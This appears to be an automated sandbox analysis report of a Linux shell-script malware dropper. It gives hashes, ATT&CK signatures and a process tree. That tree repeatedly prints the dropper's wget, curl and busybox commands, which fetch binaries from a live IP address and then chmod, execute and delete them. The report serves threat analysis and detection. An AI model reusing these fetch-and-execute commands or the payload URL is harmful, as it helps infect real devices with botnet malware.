Analysis
-
max time kernel
20s -
max time network
57s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 795 chmod 826 chmod 854 chmod 763 chmod 836 chmod 848 chmod 860 chmod 782 chmod 742 chmod 776 chmod 811 chmod 866 chmod 727 chmod 699 chmod 709 chmod 842 chmod 688 chmod -
Executes dropped EXE 17 IoCs
ioc pid Process /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 689 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 700 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 710 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 728 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 744 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 764 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 783 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 797 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 812 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 827 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 837 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 843 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 849 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 855 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 861 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 867 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM -
Checks CPU configuration 1 TTPs 17 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 846 curl 847 busybox 849 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 852 curl 856 rm 845 wget 850 rm 851 wget 853 busybox 855 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:662
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:666
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:685
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:698
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:700
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:702
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:704
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:724
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:740
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:758
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:774
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:781
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:793
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:808
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:823
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:835
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:841
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:849
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:851
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:855
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:859
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:865
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:869
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97